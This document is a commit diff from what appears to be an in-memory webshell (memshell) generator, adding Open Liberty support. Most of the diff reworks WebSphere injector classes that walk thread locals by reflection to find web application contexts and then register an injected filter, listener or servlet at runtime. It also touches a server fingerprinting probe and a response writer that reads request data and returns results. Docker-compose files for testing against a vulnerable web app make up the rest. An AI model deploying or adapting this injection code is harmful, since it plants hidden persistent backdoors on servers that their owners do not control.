feat: support open-liberty javaee

Author: ReaJason

generator/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereFilterInjector.java

@@ -1,6 +1,5 @@
 package com.reajason.javaweb.memshell.injector.websphere;
 
-import javax.servlet.Filter;
 import java.io.ByteArrayInputStream;
 import java.io.ByteArrayOutputStream;
 import java.io.IOException;
@@ -14,9 +13,6 @@
 
 
 /**
- * tested v7、v8
- * update  2023/07/08
- *
  * @author ReaJason
  */
 public class WebSphereFilterInjector {
@@ -46,7 +42,7 @@ public WebSphereFilterInjector() {
         } catch (Throwable throwable) {
             msg += "context error: " + getErrorMessage(throwable);
         }
-        if (contexts == null) {
+        if (contexts == null || contexts.isEmpty()) {
             msg += "context not found";
         } else {
             for (Object context : contexts) {
@@ -87,20 +83,42 @@ private String getContextRoot(Object context) {
      */
     public Set<Object> getContext() throws Exception {
         Set<Object> contexts = new HashSet<Object>();
-        Object[] wsThreadLocals = (Object[]) getFieldValue(Thread.currentThread(), "wsThreadLocals");
-        for (Object wsThreadLocal : wsThreadLocals) {
+        Object[] threadLocals = null;
+        boolean raw = false;
+        try {
+            // WebSphere Liberty
+            threadLocals = (Object[]) getFieldValue(Thread.currentThread(), "wsThreadLocals");
+        } catch (NoSuchFieldException ignored) {
+        }
+        if (threadLocals == null) {
+            // Open Liberty
+            threadLocals = (Object[]) getFieldValue(getFieldValue(Thread.currentThread(), "threadLocals"), "table");
+            raw = true;
+        }
+        for (Object threadLocal : threadLocals) {
+            if (threadLocal == null) {
+                continue;
+            }
+            Object value = threadLocal;
+            if (raw) {
+                value = getFieldValue(threadLocal, "value");
+            }
+            if (value == null) {
+                continue;
+            }
             // for websphere 7.x
-            if (wsThreadLocal != null && wsThreadLocal.getClass().getName().endsWith("FastStack")) {
-                Object[] stackList = (Object[]) getFieldValue(wsThreadLocal, "stack");
+            if (value.getClass().getName().endsWith("FastStack")) {
+                Object[] stackList = (Object[]) getFieldValue(value, "stack");
                 for (Object stack : stackList) {
                     try {
                         Object config = getFieldValue(stack, "config");
                         contexts.add(getFieldValue(getFieldValue(config, "context"), "context"));
                     } catch (Exception ignored) {
                     }
                 }
-            } else if (wsThreadLocal != null && wsThreadLocal.getClass().getName().endsWith("WebContainerRequestState")) {;
-                contexts.add(getFieldValue(getFieldValue(getFieldValue(getFieldValue(getFieldValue(wsThreadLocal, "currentThreadsIExtendedRequest"), "_dispatchContext"), "_webapp"), "facade"), "context"));
+            } else if (value.getClass().getName().endsWith("WebContainerRequestState")) {
+                Object webApp = invokeMethod(getFieldValue(getFieldValue(value, "currentThreadsIExtendedRequest"), "_dispatchContext"), "getWebApp", null, null);
+                contexts.add(getFieldValue(getFieldValue(webApp, "facade"), "context"));
             }
         }
         return contexts;
@@ -137,45 +155,55 @@ public void inject(Object context, Object filter) throws Exception {
             return;
         }
 
-        ClassLoader classLoader = context.getClass().getClassLoader();
-        Class<?> filterMappingClass = classLoader.loadClass("com.ibm.ws.webcontainer.filter.FilterMapping");
-        Class<?> iFilterConfigClass = classLoader.loadClass("com.ibm.wsspi.webcontainer.filter.IFilterConfig");
-        Class<?> iServletConfigClass = classLoader.loadClass("com.ibm.wsspi.webcontainer.servlet.IServletConfig");
+        Class<?> filterMappingClass = loadClass(context.getClass(), "com.ibm.ws.webcontainer.filter.FilterMapping");
+        Class<?> iFilterConfigClass = loadClass(context.getClass(), "com.ibm.wsspi.webcontainer.filter.IFilterConfig");
+        Class<?> iServletConfigClass = loadClass(context.getClass(), "com.ibm.wsspi.webcontainer.servlet.IServletConfig");
 
         Object filterManager = getFieldValue(context, "filterManager");
+        Object filterConfig = invokeMethod(context, "createFilterConfig", new Class[]{String.class}, new Object[]{getClassName()});
+        invokeMethod(filterConfig, "setFilterClassName", new Class[]{String.class}, new Object[]{filter.getClass().getName()});
         try {
-            // v8
+            // v8+
+            invokeMethod(getFieldValue(context, "config"), "addFilterInfo", new Class[]{iFilterConfigClass}, new Object[]{filterConfig});
+
             Constructor<?> constructor = filterMappingClass.getConstructor(String.class, iFilterConfigClass, iServletConfigClass);
-            // com.ibm.ws.webcontainer.webapp.WebApp.commonAddFilter
-            setFieldValue(context, "initialized", false);
-            Object filterConfig = invokeMethod(context, "commonAddFilter", new Class[]{String.class, String.class, Filter.class, Class.class}, new Object[]{getClassName(), getClassName(), filter, filter.getClass()});
             Object filterMapping = constructor.newInstance(getUrlPattern(), filterConfig, null);
-            setFieldValue(context, "initialized", true);
-
-            // com.ibm.ws.webcontainer.filter.WebAppFilterManager.addFilterMapping
             invokeMethod(filterManager, "addFilterMapping", new Class[]{filterMappingClass}, new Object[]{filterMapping});
-
-            // com.ibm.ws.webcontainer.filter.WebAppFilterManager#_loadFilter
             invokeMethod(filterManager, "_loadFilter", new Class[]{String.class}, new Object[]{getClassName()});
-
         } catch (Exception e) {
+            e.printStackTrace();
             // v7
-            Object filterConfig = invokeMethod(context, "createFilterConfig", new Class[]{String.class}, new Object[]{getClassName()});
-            invokeMethod(filterConfig, "setFilterClassName", new Class[]{String.class}, new Object[]{filter.getClass().getName()});
-            setFieldValue(filterConfig, "dispatchMode", new int[]{0});
-            setFieldValue(filterConfig, "name", getClassName());
             invokeMethod(context, "addMappingFilter", new Class[]{String.class, iFilterConfigClass}, new Object[]{getUrlPattern(), filterConfig});
             invokeMethod(filterManager, "_loadFilter", new Class[]{String.class}, new Object[]{getClassName()});
         }
+
         // 清除缓存
-        invokeMethod(getFieldValue(filterManager, "chainCache"), "clear", null, null);
+        Object chainCache = getFieldValue(filterManager, "chainCache");
+        try {
+            invokeMethod(chainCache, "clear", null, null);
+        } catch (Exception e) {
+            invokeMethod(getFieldValue(chainCache, "chainCacheMap"), "clear", null, null);
+        }
     }
 
     @Override
     public String toString() {
         return msg;
     }
 
+    // bypass osgi
+    public static Class<?> loadClass(Class<?> context, String className) throws ClassNotFoundException {
+        if (context.equals(Object.class)) {
+            throw new ClassNotFoundException(className);
+        }
+        ClassLoader loader = context.getClassLoader();
+        try {
+            return loader.loadClass(className);
+        } catch (ClassNotFoundException e) {
+            return loadClass(context.getSuperclass(), className);
+        }
+    }
+
     @SuppressWarnings("all")
     public static Object invokeMethod(Object obj, String methodName, Class<?>[] paramClazz, Object[] param) throws
             Exception {

generator/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereListenerInjector.java

@@ -38,7 +38,7 @@ public WebSphereListenerInjector() {
         } catch (Throwable throwable) {
             msg += "context error: " + getErrorMessage(throwable);
         }
-        if (contexts == null) {
+        if (contexts == null || contexts.isEmpty()) {
             msg += "context not found";
         } else {
             for (Object context : contexts) {
@@ -75,20 +75,42 @@ private String getContextRoot(Object context) {
 
     public Set<Object> getContext() throws Exception {
         Set<Object> contexts = new HashSet<Object>();
-        Object[] wsThreadLocals = (Object[]) getFieldValue(Thread.currentThread(), "wsThreadLocals");
-        for (Object wsThreadLocal : wsThreadLocals) {
+        Object[] threadLocals = null;
+        boolean raw = false;
+        try {
+            // WebSphere Liberty
+            threadLocals = (Object[]) getFieldValue(Thread.currentThread(), "wsThreadLocals");
+        } catch (NoSuchFieldException ignored) {
+        }
+        if (threadLocals == null) {
+            // Open Liberty
+            threadLocals = (Object[]) getFieldValue(getFieldValue(Thread.currentThread(), "threadLocals"), "table");
+            raw = true;
+        }
+        for (Object threadLocal : threadLocals) {
+            if (threadLocal == null) {
+                continue;
+            }
+            Object value = threadLocal;
+            if (raw) {
+                value = getFieldValue(threadLocal, "value");
+            }
+            if (value == null) {
+                continue;
+            }
             // for websphere 7.x
-            if (wsThreadLocal != null && wsThreadLocal.getClass().getName().endsWith("FastStack")) {
-                Object[] stackList = (Object[]) getFieldValue(wsThreadLocal, "stack");
+            if (value.getClass().getName().endsWith("FastStack")) {
+                Object[] stackList = (Object[]) getFieldValue(value, "stack");
                 for (Object stack : stackList) {
                     try {
                         Object config = getFieldValue(stack, "config");
                         contexts.add(getFieldValue(getFieldValue(config, "context"), "context"));
                     } catch (Exception ignored) {
                     }
                 }
-            } else if (wsThreadLocal != null && wsThreadLocal.getClass().getName().endsWith("WebContainerRequestState")) {;
-                contexts.add(getFieldValue(getFieldValue(getFieldValue(getFieldValue(getFieldValue(wsThreadLocal, "currentThreadsIExtendedRequest"), "_dispatchContext"), "_webapp"), "facade"), "context"));
+            } else if (value.getClass().getName().endsWith("WebContainerRequestState")) {
+                Object webApp = invokeMethod(getFieldValue(getFieldValue(value, "currentThreadsIExtendedRequest"), "_dispatchContext"), "getWebApp", null, null);
+                contexts.add(getFieldValue(getFieldValue(webApp, "facade"), "context"));
             }
         }
         return contexts;

generator/src/main/java/com/reajason/javaweb/memshell/injector/websphere/WebSphereServletInjector.java

@@ -6,7 +6,9 @@
 import java.io.PrintStream;
 import java.lang.reflect.Field;
 import java.lang.reflect.Method;
-import java.util.*;
+import java.util.HashSet;
+import java.util.Properties;
+import java.util.Set;
 import java.util.zip.GZIPInputStream;
 
 /**
@@ -39,7 +41,7 @@ public WebSphereServletInjector() {
         } catch (Throwable throwable) {
             msg += "context error: " + getErrorMessage(throwable);
         }
-        if (contexts == null) {
+        if (contexts == null || contexts.isEmpty()) {
             msg += "context not found";
         } else {
             for (Object context : contexts) {
@@ -76,20 +78,42 @@ private String getContextRoot(Object context) {
 
     public Set<Object> getContext() throws Exception {
         Set<Object> contexts = new HashSet<Object>();
-        Object[] wsThreadLocals = (Object[]) getFieldValue(Thread.currentThread(), "wsThreadLocals");
-        for (Object wsThreadLocal : wsThreadLocals) {
+        Object[] threadLocals = null;
+        boolean raw = false;
+        try {
+            // WebSphere Liberty
+            threadLocals = (Object[]) getFieldValue(Thread.currentThread(), "wsThreadLocals");
+        } catch (NoSuchFieldException ignored) {
+        }
+        if (threadLocals == null) {
+            // Open Liberty
+            threadLocals = (Object[]) getFieldValue(getFieldValue(Thread.currentThread(), "threadLocals"), "table");
+            raw = true;
+        }
+        for (Object threadLocal : threadLocals) {
+            if (threadLocal == null) {
+                continue;
+            }
+            Object value = threadLocal;
+            if (raw) {
+                value = getFieldValue(threadLocal, "value");
+            }
+            if (value == null) {
+                continue;
+            }
             // for websphere 7.x
-            if (wsThreadLocal != null && wsThreadLocal.getClass().getName().endsWith("FastStack")) {
-                Object[] stackList = (Object[]) getFieldValue(wsThreadLocal, "stack");
+            if (value.getClass().getName().endsWith("FastStack")) {
+                Object[] stackList = (Object[]) getFieldValue(value, "stack");
                 for (Object stack : stackList) {
                     try {
                         Object config = getFieldValue(stack, "config");
                         contexts.add(getFieldValue(getFieldValue(config, "context"), "context"));
                     } catch (Exception ignored) {
                     }
                 }
-            } else if (wsThreadLocal != null && wsThreadLocal.getClass().getName().endsWith("WebContainerRequestState")) {;
-                contexts.add(getFieldValue(getFieldValue(getFieldValue(getFieldValue(getFieldValue(wsThreadLocal, "currentThreadsIExtendedRequest"), "_dispatchContext"), "_webapp"), "facade"), "context"));
+            } else if (value.getClass().getName().endsWith("WebContainerRequestState")) {
+                Object webApp = invokeMethod(getFieldValue(getFieldValue(value, "currentThreadsIExtendedRequest"), "_dispatchContext"), "getWebApp", null, null);
+                contexts.add(getFieldValue(getFieldValue(webApp, "facade"), "context"));
             }
         }
         return contexts;

generator/src/main/java/com/reajason/javaweb/probe/payload/ServerProbe.java

@@ -50,7 +50,8 @@ public static String exit(@Advice.Return(readOnly = false) String ret) {
         if (System.getProperty("weblogic.home") != null) {
             return ret = "WebLogic";
         }
-        if (System.getProperty("was.install.root") != null) {
+        if (System.getProperty("was.install.root") != null
+                || System.getProperty("wlp.install.dir") != null) {
             return ret = "WebSphere";
         }
         if (System.getProperty("resin.home") != null) {

generator/src/main/java/com/reajason/javaweb/probe/payload/response/WebSphereWriter.java

@@ -22,17 +22,35 @@ public WebSphereWriter() {
             return;
         }
         try {
-            Object[] wsThreadLocals = (Object[]) getFieldValue(Thread.currentThread(), "wsThreadLocals");
-            for (Object wsThreadLocal : wsThreadLocals) {
-                if (wsThreadLocal == null) {
+            Object[] threadLocals = null;
+            boolean raw = false;
+            try {
+                // WebSphere Liberty
+                threadLocals = (Object[]) getFieldValue(Thread.currentThread(), "wsThreadLocals");
+            } catch (NoSuchFieldException ignored) {
+            }
+            if (threadLocals == null) {
+                // Open Liberty
+                threadLocals = (Object[]) getFieldValue(getFieldValue(Thread.currentThread(), "threadLocals"), "table");
+                raw = true;
+            }
+            for (Object threadLocal : threadLocals) {
+                if (threadLocal == null) {
+                    continue;
+                }
+                Object value = threadLocal;
+                if (raw) {
+                    value = getFieldValue(threadLocal, "value");
+                }
+                if (value == null) {
                     continue;
                 }
                 // com.ibm.wsspi.webcontainer.WebContainerRequestState
-                if (wsThreadLocal.getClass().getName().endsWith("WebContainerRequestState")) {
+                if (value.getClass().getName().endsWith("WebContainerRequestState")) {
                     // com.ibm.ws.webcontainer.srt.SRTServletRequest
-                    Object request = getFieldValue(wsThreadLocal, "currentThreadsIExtendedRequest");
+                    Object request = getFieldValue(value, "currentThreadsIExtendedRequest");
                     // com.ibm.ws.webcontainer.srt.SRTServletResponse
-                    Object response = getFieldValue(wsThreadLocal, "currentThreadsIExtendedResponse");
+                    Object response = getFieldValue(value, "currentThreadsIExtendedResponse");
                     String data = getDataFromReq(request);
                     if (data != null && !data.isEmpty()) {
                         String result = "";

integration-test/docker-compose/websphere/open-liberty-18.0.0.4-docker-compose.yaml

@@ -0,0 +1,11 @@
+services:
+  open-liberty-18:
+    image: open-liberty:18.0.0.4-webProfile8
+    platform: linux/amd64
+    ports:
+      - "9080:9080"
+      - "5005:5005"
+    environment:
+      JAVA_TOOL_OPTIONS: -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005
+    volumes:
+      - ../../../vul/vul-webapp/build/libs/vul-webapp.war:/config/dropins/app.war

integration-test/docker-compose/websphere/open-liberty-20.0.0.12-docker-compose.yaml

@@ -0,0 +1,11 @@
+services:
+  open-liberty-20:
+    image: open-liberty:20.0.0.12-full-java8-openj9
+    platform: linux/amd64
+    ports:
+      - "9080:9080"
+      - "5005:5005"
+    environment:
+      JAVA_TOOL_OPTIONS: -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005
+    volumes:
+      - ../../../vul/vul-webapp/build/libs/vul-webapp.war:/config/dropins/app.war

integration-test/docker-compose/websphere/open-liberty-22.0.0.12-docker-compose.yaml

@@ -0,0 +1,11 @@
+services:
+  open-liberty-22:
+    image: open-liberty:22.0.0.12-full-java11-openj9
+    platform: linux/amd64
+    ports:
+      - "9080:9080"
+      - "5005:5005"
+    environment:
+      JAVA_TOOL_OPTIONS: -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005
+    volumes:
+      - ../../../vul/vul-webapp/build/libs/vul-webapp-jakarta.war:/config/dropins/app.war

integration-test/docker-compose/websphere/open-liberty-25.0.0.12-docker-compose.yaml

@@ -0,0 +1,11 @@
+services:
+  open-liberty-25:
+    image: open-liberty:25.0.0.12-full-java17-openj9
+    platform: linux/amd64
+    ports:
+      - "9080:9080"
+      - "5005:5005"
+    environment:
+      JAVA_TOOL_OPTIONS: -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005
+    volumes:
+      - ../../../vul/vul-webapp/build/libs/vul-webapp.war:/config/dropins/app.war

integration-test/script/websphere_pid.sh

@@ -1,2 +1,2 @@
 #!/bin/bash
-pgrep -f WSLauncher | tr -d '\n'
+pgrep -f 'WSLauncher|ws-server.jar' | tr -d '\n'